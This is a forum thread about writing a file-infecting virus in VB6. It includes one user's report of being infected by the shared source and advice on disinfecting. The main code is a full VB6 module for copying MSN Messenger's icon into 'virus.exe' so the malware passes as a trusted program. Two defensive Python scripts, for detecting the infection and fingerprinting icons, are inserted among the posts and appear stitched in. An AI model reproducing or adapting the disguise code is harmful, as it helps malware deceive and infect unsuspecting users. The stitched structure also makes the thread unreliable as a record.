Topic: [Source] Infecting executables in VB6 (Read 22,542 times)
Saok Dagon

thanks, that came in perfect for me. Right, I've now got the icon extracted; what I need now is to replace it (I'll use iconchanger). Let's see if the structure is right like this: ReplaceIcons picViewIcon.Picture, Victim (picViewIcon.Picture = the_icon; Victim = the_path_to_the_exe). Would that work, or would I need to add something else? regards
LeandroA

hi, I'm afraid none of the modules posted so far are efficient. The only way to get a good result is to work with the APIs LoadResource, EnumResourceLanguages, EnumResourceNamesByNum, EnumResourceNamesByString, EnumResourceTypes and especially BeginUpdateResource, UpdateResource, EndUpdateResource.
I'll see if I can put together a module to change the icon of one exe for that of another exe.
Saok Dagon

Hi
ok, let's see how it turns out for you, because I developed mine out of everything they suggested to me and it came to too many lines; it was bloating the bug far too much.
regards
slossetti

Hi, I'm joining the forum because someone got onto the machine where I work, went onto this forum and deliberately downloaded the code in question, and it infected my PC. Looking for some information I found this forum; I wanted to ask you how it can be removed, since it makes using the PC impossible.
Thanks.
Saok Dagon

if you tell us which code it is, a "vaccine" can be made for it.
If not, look through your processes and kill the virus's process, or whichever one looks suspicious to you, and then run the AV to see if it does anything useful.
slossetti

It's the one discussed in this post, the one with the source available for download.
In every process and file the PC runs, a window opens that says "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
Regards.
byebye

well, grab a hex editor and, knowing the file size, it's easy to remove. As far as I remember they said it was made to work like this: virus+marker+original program. If nothing is modified on each infection the size is fixed, so knowing the virus's size you recover the original quickly; or else, since there are 2 headers, you search for them and fix it.
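byebye's recipe (a fixed-size infector, a marker, then the original program, i.e. two PE headers in one file) is easy to automate, and the "vaccine" Saok Dagon mentions earlier is essentially the same thing. The script below is an added example written for this thread, not code from the thread or from the source being discussed: it detects a file that carries more than one valid PE header and carves the original program out, either from a known stub size plus marker or from the second header. The "infected" file it works on is constructed inline from minimal MZ/PE stub headers (not real executables), and the marker bytes and stub sizes are placeholders, not the real virus's values.

```python
"""Detect and undo a prepending infector of the form  virus + marker + original.

Added example for this thread (not the thread's own code). The 'infected' file
is constructed inline from minimal MZ/PE stubs, and the marker is a placeholder.
"""
import struct
import sys


def find_pe_headers(data: bytes) -> list:
    """Offsets of every plausible PE image start in data.

    A candidate is an 'MZ' signature whose e_lfanew (DWORD at +0x3C) points
    inside the buffer at a 'PE\\0\\0' signature. Ordinary code and data rarely
    satisfy both, so two hits usually mean one file was prepended to another.
    """
    offsets = []
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if e_lfanew >= 0x40 and pe + 4 <= len(data) and data[pe:pe + 4] == b"PE\0\0":
                offsets.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return offsets


def looks_prepended(data: bytes) -> bool:
    """Detection rule: more than one valid PE header inside a single file."""
    return len(find_pe_headers(data)) > 1


def recover_original(data: bytes, stub_size: int = None, marker: bytes = b"") -> bytes:
    """Bytes of the original program, or None if the layout is not recognised.

    With stub_size given (the fixed size of the infector, as byebye describes)
    the original starts right after stub + marker; otherwise fall back to the
    second PE header found in the file. Either way the chosen offset must itself
    be a valid PE header, so a wrong guess returns None instead of garbage.
    """
    headers = find_pe_headers(data)
    if stub_size is not None:
        start = stub_size + len(marker)
        if marker and data[stub_size:start] != marker:
            return None  # marker not where the fixed layout says it should be
    elif len(headers) >= 2:
        start = headers[1]
    else:
        return None
    if start not in headers:
        return None  # whatever sits at that offset is not a PE image
    return data[start:]


# --- constructed sample data (not real executables) -------------------------

def make_stub_pe(tag: bytes) -> bytes:
    """Minimal 'MZ' DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + tag


SAMPLE_INFECTOR = make_stub_pe(b"infector-stub")
SAMPLE_MARKER = b"<<MARK>>"            # placeholder for the virus's own marker bytes
SAMPLE_ORIGINAL = make_stub_pe(b"original-program")
SAMPLE_INFECTED = SAMPLE_INFECTOR + SAMPLE_MARKER + SAMPLE_ORIGINAL

if __name__ == "__main__":
    # usage: script.py infected.exe recovered.exe   (no arguments: run on the sample)
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
        out = recover_original(blob)
        if out is None:
            sys.exit("no prepended PE layout found")
        with open(sys.argv[2], "wb") as f:
            f.write(out)
    else:
        print("headers at", find_pe_headers(SAMPLE_INFECTED),
              "recovered ok:", recover_original(SAMPLE_INFECTED) == SAMPLE_ORIGINAL)
```

The second-header fallback only works when the infector does not tamper with the original's headers; when it does, the fixed-size path with the marker is the one to use, and a mismatch on the marker is reported rather than silently producing a broken file.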
Mad Antrax

Quote from: slossetti
> It's the one discussed in this post, the one with the source available for download.
> In every process and file the PC runs, a window opens that says "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"
> Regards.

Good grief, and I said it clearly: CAREFUL, not the code compiled on your own machine, because it would infect your files xD Be careful, regards!! Well, if it was with the same source from the first page, a simple vaccine can be made by changing a few values... but right now I don't even have time to look at it. You'll have to wait for the weekend, or wait and see if some user does it.

I don't make hacks/cheats for online games. Nor do I help anyone make hacks/cheats for online games.
LeandroA

well, continuing with the icons topic, here's a module to change the icon of one exe for that of another exe. It's a bit long since it wasn't made for this purpose, but it can be shortened quite a lot and optimised further. In a .bas module:

Option Explicit
' modified by LIA 14/04/07

Private Type ICONDIRENTRY
    bWidth As Byte          ' Width of the image
    bHeight As Byte         ' Height of the image (times 2)
    bColorCount As Byte     ' Number of colors in image (0 if >=8bpp)
    bReserved As Byte       ' Reserved
    wPlanes As Integer      ' Color Planes
    wBitCount As Integer    ' Bits per pixel
    dwBytesInRes As Long    ' How many bytes in this resource?
    dwImageOffset As Long   ' Where in the file is this image
End Type

Private Type ICONDIR
    idReserved As Integer   ' Reserved
    idType As Integer       ' Resource type (1 for icons)
    idCount As Integer      ' How many images?
    ' idEntries() As ICONDIRENTRY array follows.
End Type

Private Type tBits
    bBits() As Byte
End Type

Private Type IcoExe
    IcoDir As ICONDIR
    Entries() As ICONDIRENTRY
End Type

Private Type Ico
    IcoDir As ICONDIR           ' header
    Entries() As ICONDIRENTRY   ' describes each icon
    IcoData() As tBits          ' image data
End Type

' In-memory (RT_GROUP_ICON) entry: like ICONDIRENTRY but 14 bytes, ending in the RT_ICON id.
Private Type MEMICONDIRENTRY
    bWidth As Byte          ' Width of the image
    bHeight As Byte         ' Height of the image (times 2)
    bColorCount As Byte     ' Number of colors in image (0 if >=8bpp)
    bReserved As Byte       ' Reserved
    wPlanes As Integer      ' Color Planes
    wBitCount As Integer    ' Bits per pixel
    dwBytesInRes As Long    ' How many bytes in this resource?
    nID As Integer          ' The ID
End Type

Private Const IMAGE_ICON = 1

' File read/write through Win32. Declares are modified from the VB versions to
' allow null to be passed to lpSecurityAttributes and lpOverlapped:
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Const GENERIC_READ = &H80000000
Private Const GENERIC_WRITE = &H40000000
Private Const OPEN_EXISTING = 3
Private Const CREATE_ALWAYS = 2
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const INVALID_HANDLE_VALUE = -1
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Private Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Private Const FILE_BEGIN = 0

' Resource functions:
Private Declare Function LoadLibraryEx Lib "kernel32" Alias "LoadLibraryExA" (ByVal lpLibFileName As String, ByVal hFile As Long, ByVal dwFlags As Long) As Long
Private Const LOAD_LIBRARY_AS_DATAFILE = &H2&
Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Private Declare Function LoadResource Lib "kernel32" (ByVal hInstance As Long, ByVal hResInfo As Long) As Long
Private Declare Function LockResource Lib "kernel32" (ByVal hResData As Long) As Long
Private Declare Function FindResource Lib "kernel32" Alias "FindResourceA" (ByVal hInstance As Long, lpName As Any, lpType As Any) As Long
Private Declare Function SizeofResource Lib "kernel32" (ByVal hInstance As Long, ByVal hResInfo As Long) As Long
Private Declare Function FreeResource Lib "kernel32" (ByVal hResData As Long) As Long
Private Declare Function BeginUpdateResource Lib "kernel32.dll" Alias "BeginUpdateResourceA" (ByVal pFileName As String, ByVal bDeleteExistingResources As Long) As Long
Private Declare Function UpdateResource Lib "kernel32.dll" Alias "UpdateResourceA" (ByVal hUpdate As Long, ByVal lpType As Long, ByVal lpName As Long, ByVal wLanguage As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function EndUpdateResource Lib "kernel32.dll" Alias "EndUpdateResourceA" (ByVal hUpdate As Long, ByVal fDiscard As Long) As Long
Private Declare Function EnumResourceNamesByNum Lib "kernel32" Alias "EnumResourceNamesA" (ByVal hModule As Long, ByVal lpType As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long

Private Const RT_ICON = 3
Private Const DIFFERENCE = 11
Private Const RT_GROUP_ICON = RT_ICON + DIFFERENCE

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
    lpvDest As Any, lpvSource As Any, ByVal cbCopy As Long)

Private m_sFile As String
Private m_vID As Variant
Private m_tID As ICONDIR
Private m_tIDE() As ICONDIRENTRY
Private m_tBits() As tBits
Private m_VName As Variant

' Copies the first RT_GROUP_ICON of Source into Dest, going through a temporary .ico on C:\.
Public Function RemplaceIcons(Source As String, Dest As String) As Boolean
    Dim m_hMod As Long

    If Not CanWrite(Dest) Then Exit Function

    ' Enumerate the group icons of Source; the callback stores the first name/ID in m_VName.
    m_hMod = LoadLibraryEx(Source, ByVal 0&, LOAD_LIBRARY_AS_DATAFILE)
    If m_hMod = 0 Then Exit Function
    Call EnumResourceNamesByNum(m_hMod, RT_GROUP_ICON, AddressOf EnumResNamesProc, 0)
    FreeLibrary m_hMod

    ' A group icon is identified either by an integer ID or by a string name.
    If (VarType(m_VName) = vbLong) Then
        If Not LoadIconFromEXE(Source, m_VName) Then Exit Function
    Else
        If Not LoadIconFromEXE(Source, , m_VName) Then Exit Function
    End If
    If Not SaveIcon("c:\" & m_VName & ".ico") Then Exit Function

    If ReplaceIcoInExe(Dest, "c:\" & m_VName & ".ico", 1, m_VName, 0) Then
        RemplaceIcons = True
    End If
End Function

' Returns True if File can be opened for writing.
Private Function CanWrite(File As String) As Boolean
    On Local Error GoTo Denegar
    Dim FF As Integer
    FF = FreeFile
    Open File For Binary Access Write As #FF
    Close #FF
    CanWrite = True
    Exit Function
Denegar:
End Function

' Loads an icon from an executable (EXE, DLL etc). Use the EnumResources module
' to determine the available resource IDs.
Private Function LoadIconFromEXE( _
        ByVal sFile As String, _
        Optional ByVal lpID As Long = 0, _
        Optional ByVal lpName As String = "" _
    ) As Boolean
    Dim hLibrary As Long
    Dim hRsrc As Long
    Dim hGlobal As Long
    Dim lPtr As Long
    Dim iEntry As Long
    Dim tMIDE As MEMICONDIRENTRY
    Dim nID() As Integer
    Dim b() As Byte
    Dim iBaseOffset As Long
    Dim lSize As Long
    Dim bFail As Boolean

    m_sFile = sFile
    m_vID = Empty
    Erase m_tIDE
    Erase m_tBits
    With m_tID
        .idCount = 0
        .idReserved = 0
        .idType = 0
    End With

    hLibrary = LoadLibraryEx(sFile, ByVal 0&, LOAD_LIBRARY_AS_DATAFILE)
    If (hLibrary = 0) Then
        ' Failed to load the executable. Probably not a Win32 EXE.
        LoadIconFromEXE = False
    Else
        ' Find the resource:
        If (lpID <> 0) Then
            lpName = "#" & CStr(lpID)
            hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_GROUP_ICON)
            m_vID = lpID
        Else
            hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_GROUP_ICON)
            m_vID = lpName
        End If
        If (hRsrc = 0) Then
            ' Resource not found in this library:
            LoadIconFromEXE = False
        Else
            ' Load the resource (returns a handle which can be used to access the data):
            hGlobal = LoadResource(hLibrary, hRsrc)
            If (hGlobal = 0) Then
                LoadIconFromEXE = False
            Else
                ' Lock the resource for reading (returns a pointer to the resource data):
                lPtr = LockResource(hGlobal)
                If (lPtr = 0) Then
                    LoadIconFromEXE = False
                Else
                    ' Get the icon header:
                    CopyMemory m_tID, ByVal lPtr, Len(m_tID)
                    Debug.Print m_tID.idCount, m_tID.idReserved, m_tID.idType
                    ' Do we have icons in this resource?
                    If (m_tID.idCount > 0) Then
                        ' For each of the entries, get the icon directory information:
                        ReDim m_tIDE(0 To m_tID.idCount - 1) As ICONDIRENTRY
                        ReDim nID(0 To m_tID.idCount - 1) As Integer
                        ' Get all the directory information into a byte array (to avoid
                        ' problems with WORD alignment of structures):
                        ReDim b(0 To Len(m_tID) + Len(tMIDE) * m_tID.idCount - 1) As Byte
                        CopyMemory b(0), ByVal lPtr, Len(m_tID) + Len(tMIDE) * m_tID.idCount
                        ' Loop through the entries, getting the IDs and creating a standard
                        ' ICONDIRENTRY structure:
                        For iEntry = 0 To m_tID.idCount - 1
                            ' Get the MEMICONDIRENTRY structure:
                            CopyMemory tMIDE, b(Len(m_tID) + iEntry * Len(tMIDE)), Len(tMIDE)
                            ' Store the icon's resource id:
                            nID(iEntry) = tMIDE.nID
                            ' Copy data into standard ICONDIRENTRY structure. Note the .dwImageOffset
                            ' member will be wrong at this stage:
                            CopyMemory m_tIDE(iEntry), tMIDE, Len(tMIDE)
                        Next iEntry
                        ' Now correct the ICONDIRENTRY byte offsets:
                        iBaseOffset = Len(m_tID) + Len(m_tIDE(0)) * m_tID.idCount
                        m_tIDE(0).dwImageOffset = iBaseOffset
                        For iEntry = 1 To m_tID.idCount - 1
                            m_tIDE(iEntry).dwImageOffset = m_tIDE(iEntry - 1).dwImageOffset + m_tIDE(iEntry - 1).dwBytesInRes
                        Next iEntry
                        ' Now we have the ICONDIRENTRY structures, get the actual bits of the icons:
                        ReDim m_tBits(0 To m_tID.idCount - 1) As tBits
                        For iEntry = 0 To m_tID.idCount - 1
                            ' Load the icon with the specified resource ID:
                            lpName = "#" & nID(iEntry)
                            hRsrc = FindResource(hLibrary, ByVal lpName, ByVal RT_ICON)
                            If (hRsrc = 0) Then
                                bFail = True
                                Exit For
                            Else
                                ' Load the resource:
                                hGlobal = LoadResource(hLibrary, hRsrc)
                                If (hGlobal = 0) Then
                                    bFail = True
                                    Exit For
                                Else
                                    ' Determine the size of the resource:
                                    lSize = SizeofResource(hLibrary, hRsrc)
                                    ' If the size is valid:
                                    If (lSize > 0) And (lSize = m_tIDE(iEntry).dwBytesInRes) Then
                                        ' Lock the resource and get a pointer to the memory:
                                        lPtr = LockResource(hGlobal)
                                        If (lPtr = 0) Then
                                            bFail = True
                                            Exit For
                                        Else
                                            ' Store this memory in the bitmap bits array:
                                            ReDim Preserve m_tBits(iEntry).bBits(0 To lSize - 1) As Byte
                                            CopyMemory m_tBits(iEntry).bBits(0), ByVal lPtr, lSize
                                        End If
                                    Else
                                        ' Size does not match the directory entry:
                                        bFail = True
                                        Exit For
                                    End If
                                End If
                            End If
                        Next iEntry

                        ' Did we succeed?
                        If (bFail) Then
                            ' Failed to read bitmap bits from resource; ensure clear:
                            sFile = ""
                            Erase m_tIDE
                            Erase m_tBits
                            m_tID.idCount = 0
                            m_vID = Empty
                        End If
                        LoadIconFromEXE = Not (bFail)
                    End If
                End If
            End If
        End If
        ' Free library:
        FreeLibrary hLibrary
    End If
End Function

' Writes the icon currently held in m_tID / m_tIDE / m_tBits to an .ico file.
Private Function SaveIcon(Optional ByVal sFileName As String = "") As Boolean
    Dim hFile As Long
    Dim dwBytesWritten As Long
    Dim iEntry As Long
    Dim bFail As Boolean

    ' General error checking:
    If (m_sFile = "") Then
        If (sFileName = "") Then
            ' No filename specified.
            Exit Function
        End If
    End If
    If (m_tID.idCount = 0) Then
        ' Icon contains no images.
        Exit Function
    End If

    ' Now start writing:
    If (sFileName <> "") Then
        m_sFile = sFileName
    End If
    ' Open the file for write:
    hFile = CreateFile(m_sFile, GENERIC_WRITE, 0, ByVal 0&, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, ByVal 0&)
    If (hFile = INVALID_HANDLE_VALUE) Then
        ' Couldn't open file for writing.
    Else
        ' Write the header:
        WriteFile hFile, m_tID, Len(m_tID), dwBytesWritten, ByVal 0&
        If (dwBytesWritten = Len(m_tID)) Then
            ' Write the ICONDIRENTRY structures:
            For iEntry = 0 To m_tID.idCount - 1
                WriteFile hFile, m_tIDE(iEntry), Len(m_tIDE(iEntry)), dwBytesWritten, ByVal 0&
                If (dwBytesWritten <> Len(m_tIDE(iEntry))) Then
                    bFail = True
                    Exit For
                End If
            Next iEntry
            ' Write the icon bits:
            If Not (bFail) Then
                For iEntry = 0 To m_tID.idCount - 1
                    WriteFile hFile, m_tBits(iEntry).bBits(0), m_tIDE(iEntry).dwBytesInRes, dwBytesWritten, ByVal 0&
                    If (m_tIDE(iEntry).dwBytesInRes <> dwBytesWritten) Then
                        bFail = True
                        Exit For
                    End If
                Next iEntry
            End If
        Else
            bFail = True
        End If
        ' Close the file:
        CloseHandle hFile
        ' Did we succeed?
        SaveIcon = Not (bFail)
    End If
End Function

' Reads an .ico file into an Ico structure (idCount stays 0 if the file is not an icon).
Private Function OpenIconFile(Filename As String) As Ico
    Dim t As Ico        ' temporary structure
    Dim X As Long       ' counter
    Dim FF As Integer

    FF = FreeFile
    ' open the file
    Open Filename For Binary As #FF
    ' read the file header
    Get #FF, , t.IcoDir
    If t.IcoDir.idType <> 1 Or t.IcoDir.idCount < 1 Then
        Close #FF
        t.IcoDir.idCount = 0
        OpenIconFile = t
        Exit Function
    End If
    ' resize to the number of icons
    ReDim t.Entries(0 To t.IcoDir.idCount - 1)
    ReDim t.IcoData(0 To t.IcoDir.idCount - 1)
    ' for each icon
    For X = 0 To t.IcoDir.idCount - 1
        ' read the icon's directory entry (16 bytes each, after the 6-byte header)
        Get #FF, 6 + 16 * X + 1, t.Entries(X)
        ' resize to the size of the image data
        ReDim t.IcoData(X).bBits(t.Entries(X).dwBytesInRes - 1)
        ' read the image data
        Get #FF, t.Entries(X).dwImageOffset + 1, t.IcoData(X).bBits
    Next
    ' close the file
    Close #FF
    ' return the data
    OpenIconFile = t
End Function

' Builds the in-memory (RT_GROUP_ICON) directory for an icon; dwImageOffset is
' reused to hold the RT_ICON resource ID of each image (IDBase, IDBase + 1, ...).
Private Function MakeIcoExe(IconFile As Ico, IDBase As Long) As IcoExe
    Dim t As IcoExe     ' temporary structure
    Dim X As Long       ' counter

    ' number of icons
    t.IcoDir.idCount = IconFile.IcoDir.idCount
    ' type: icon = 1
    t.IcoDir.idType = 1
    ' one entry per image
    ReDim t.Entries(IconFile.IcoDir.idCount - 1)

    ' for each entry
    For X = 0 To t.IcoDir.idCount - 1
        ' icon headers
        t.Entries(X).bColorCount = IconFile.Entries(X).bColorCount
        t.Entries(X).bHeight = IconFile.Entries(X).bHeight
        t.Entries(X).bReserved = IconFile.Entries(X).bReserved
        t.Entries(X).bWidth = IconFile.Entries(X).bWidth
        t.Entries(X).dwBytesInRes = IconFile.Entries(X).dwBytesInRes
        t.Entries(X).dwImageOffset = X + IDBase
        t.Entries(X).wBitCount = IconFile.Entries(X).wBitCount
        t.Entries(X).wPlanes = IconFile.Entries(X).wPlanes
    Next
    ' return the structure
    MakeIcoExe = t
End Function

' Writes the images of the .ico file sFile into the executable Filename as RT_ICON
' resources BaseID, BaseID + 1, ... and the RT_GROUP_ICON named GroupID. Note that
' UpdateResource is declared with lpName ByVal As Long, so GroupID must be an
' integer ID here; a string name would raise a type mismatch.
Private Function ReplaceIcoInExe(Filename As String, sFile As String, BaseID As Long, GroupID As Variant, LangID As Long) As Boolean
    Dim hWrite As Long      ' update handle
    Dim Exe As IcoExe       ' icon resource structure
    Dim ret As Long         ' return value
    Dim X As Long           ' counter
    Dim D() As Byte         ' buffer
    Dim IcoFile As Ico

    IcoFile = OpenIconFile(sFile)
    If IcoFile.IcoDir.idCount < 1 Then Exit Function

    ' get an update handle
    hWrite = BeginUpdateResource(Filename, 0)
    ' on failure, leave
    If hWrite = 0 Then ReplaceIcoInExe = False: Exit Function

    ' otherwise, build the group directory from the icon
    Exe = MakeIcoExe(IcoFile, BaseID)

    ' size the buffer: 6-byte header plus 14 bytes per entry
    ReDim D(6 + 14 * Exe.IcoDir.idCount)
    ' copy the header into the buffer
    CopyMemory ByVal VarPtr(D(0)), ByVal VarPtr(Exe.IcoDir), 6

    ' for each icon
    For X = 0 To Exe.IcoDir.idCount - 1
        ' copy the 14-byte entry (the low word of dwImageOffset becomes nID)
        CopyMemory ByVal VarPtr(D(6 + 14 * X)), ByVal VarPtr(Exe.Entries(X).bWidth), 14&
    Next

    ' update the group icon resource
    ret = UpdateResource(hWrite, RT_GROUP_ICON, GroupID, LangID, ByVal VarPtr(D(0)), UBound(D))
    ' on failure, discard the changes and leave
    If ret = 0 Then ReplaceIcoInExe = False: EndUpdateResource hWrite, 1: Exit Function

    ' update each icon resource
    For X = 0 To Exe.IcoDir.idCount - 1
        ret = UpdateResource(hWrite, RT_ICON, Exe.Entries(X).dwImageOffset, LangID, ByVal VarPtr(IcoFile.IcoData(X).bBits(0)), Exe.Entries(X).dwBytesInRes)
        If ret = 0 Then ReplaceIcoInExe = False: EndUpdateResource hWrite, 1: Exit Function
    Next

    ' commit to the executable file
    ret = EndUpdateResource(hWrite, 0)
    ' on failure, leave
    If ret = 0 Then ReplaceIcoInExe = False: Exit Function

    ' otherwise, success
    ReplaceIcoInExe = True
End Function

' EnumResourceNames callback: stores the first group icon's ID (integer) or
' name (string) in m_VName. Returning 0 stops the enumeration after it.
Public Function EnumResNamesProc( _
        ByVal hMod As Long, _
        ByVal lpszType As Long, _
        ByVal lpszName As Long, _
        ByVal lParam As Long _
    ) As Long
    Dim b() As Byte, lLen As Long

    If (lpszName And &HFFFF0000) = 0 Then
        ' IS_INTRESOURCE: high word is zero, the low word is the ID
        m_VName = lpszName And &HFFFF&
    Else
        ' otherwise lpszName points to an ANSI string
        lLen = lstrlen(lpszName)
        If (lLen > 0) Then
            ReDim b(0 To lLen - 1) As Byte
            CopyMemory b(0), ByVal lpszName, lLen
            m_VName = StrConv(b, vbUnicode)
        End If
    End If
    EnumResNamesProc = 0
End Function

To test it, on a form with a button and an exe in c:\ called virus.exe (to be clear, this is harmless, no problems, it only changes the icon):

Private Sub Command1_Click()
    ' the first is the one to take the icon from, for example MSN Messenger
    ' and the second is the one we add it to, i.e. virus.exe
    MsgBox RemplaceIcons("C:\Archivos de programa\MSN Messenger\msnmsgr.exe", "C:\Virus.exe")
End Sub

some APIs only work under Win XP, but there are substitutes, so if you're interested it can be improved too. I didn't do it because I don't have Win 98 and didn't know whether it was going to work, but whatever comes up we'll look at it and modify it. Regards
« Last edit: 14 April 2007, 23:54 pm by LeandroA »
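The core of LeandroA's module is the conversion between the on-disk .ico directory (16-byte ICONDIRENTRY ending in dwImageOffset) and the RT_GROUP_ICON resource layout (14-byte entry ending in a 16-bit nID that names the matching RT_ICON). The following Python is an added example written for this thread, not LeandroA's code: it does that conversion in both directions and fingerprints the image bits, which is what an analyst needs to rebuild the icon of a suspect sample from its extracted resources and compare it with the icon of the application the sample imitates. The icon image is constructed (a 1x1 pixel, 32 bpp bitmap); the resource bytes you would feed it in practice come from a PE resource parser of your choice, which is assumed and not shown.

```python
"""ICO file <-> RT_GROUP_ICON resource layout, plus an icon fingerprint.

Added example for this thread (not LeandroA's module). The icon image is a
constructed 1x1 32-bpp bitmap; real input would come from a PE resource parser.
"""
import hashlib
import struct

ICONDIR_FMT = "<HHH"               # idReserved, idType, idCount                 (6 bytes)
ICONDIRENTRY_FMT = "<BBBBHHII"     # ..., wBitCount, dwBytesInRes, dwImageOffset (16 bytes)
GRPICONDIRENTRY_FMT = "<BBBBHHIH"  # ..., wBitCount, dwBytesInRes, nID           (14 bytes)


def parse_ico(data: bytes) -> list:
    """[(first six entry fields, image bytes), ...] for an .ico file, with bounds checks."""
    reserved, idtype, count = struct.unpack_from(ICONDIR_FMT, data, 0)
    if reserved != 0 or idtype != 1:
        raise ValueError("not an .ico file")
    images = []
    for i in range(count):
        fields = struct.unpack_from(ICONDIRENTRY_FMT, data, 6 + 16 * i)
        size, offset = fields[6], fields[7]
        if offset + size > len(data):
            raise ValueError("icon entry %d points outside the file" % i)
        images.append((fields[:6], data[offset:offset + size]))
    return images


def ico_to_group_icon(images: list, base_id: int):
    """The RT_GROUP_ICON blob and the {nID: image} map a PE would carry for these images."""
    if base_id < 1 or base_id + len(images) - 1 > 0xFFFF:
        raise ValueError("nID must fit in 16 bits")
    blob = struct.pack(ICONDIR_FMT, 0, 1, len(images))
    resources = {}
    for i, (fields, img) in enumerate(images):
        nid = base_id + i
        blob += struct.pack(GRPICONDIRENTRY_FMT, *fields, len(img), nid)
        resources[nid] = img
    return blob, resources


def group_icon_to_ico(blob: bytes, resources: dict) -> bytes:
    """Rebuild an .ico file from a RT_GROUP_ICON blob and its RT_ICON images."""
    _reserved, idtype, count = struct.unpack_from(ICONDIR_FMT, blob, 0)
    if idtype != 1 or len(blob) < 6 + 14 * count:
        raise ValueError("bad or truncated group icon directory")
    header = struct.pack(ICONDIR_FMT, 0, 1, count)
    entries, body = b"", b""
    offset = 6 + 16 * count  # images follow the 16-byte-per-entry file directory
    for i in range(count):
        e = struct.unpack_from(GRPICONDIRENTRY_FMT, blob, 6 + 14 * i)
        size, nid = e[6], e[7]
        img = resources.get(nid)
        if img is None or len(img) != size:
            raise ValueError("RT_ICON %d missing or its size does not match" % nid)
        entries += struct.pack(ICONDIRENTRY_FMT, *e[:6], size, offset)
        body += img
        offset += size
    return header + entries + body


def icon_fingerprint(ico: bytes) -> str:
    """SHA-256 over the image bits only, independent of entry order and offsets."""
    h = hashlib.sha256()
    for _, img in sorted(parse_ico(ico), key=lambda t: t[1]):
        h.update(img)
    return h.hexdigest()


# --- constructed sample: one 1x1 32-bpp icon --------------------------------
def constructed_sample_ico() -> bytes:
    # BITMAPINFOHEADER with biHeight doubled (XOR + AND masks), then one BGRA
    # pixel and one 4-byte AND-mask row: 40 + 4 + 4 = 48 bytes of image data.
    bih = struct.pack("<IiiHHIIiiII", 40, 1, 2, 1, 32, 0, 8, 0, 0, 0, 0)
    img = bih + b"\x00\x00\xff\xff" + b"\x00\x00\x00\x00"
    entry = struct.pack(ICONDIRENTRY_FMT, 1, 1, 0, 0, 1, 32, len(img), 6 + 16)
    return struct.pack(ICONDIR_FMT, 0, 1, 1) + entry + img
```

To use it on a real sample, extract the RT_GROUP_ICON blob and the RT_ICON images with a PE parser, call group_icon_to_ico, and compare icon_fingerprint of the result with the fingerprint of the legitimate application's icon; a match on a binary that is not that application is the disguise this thread's module produces.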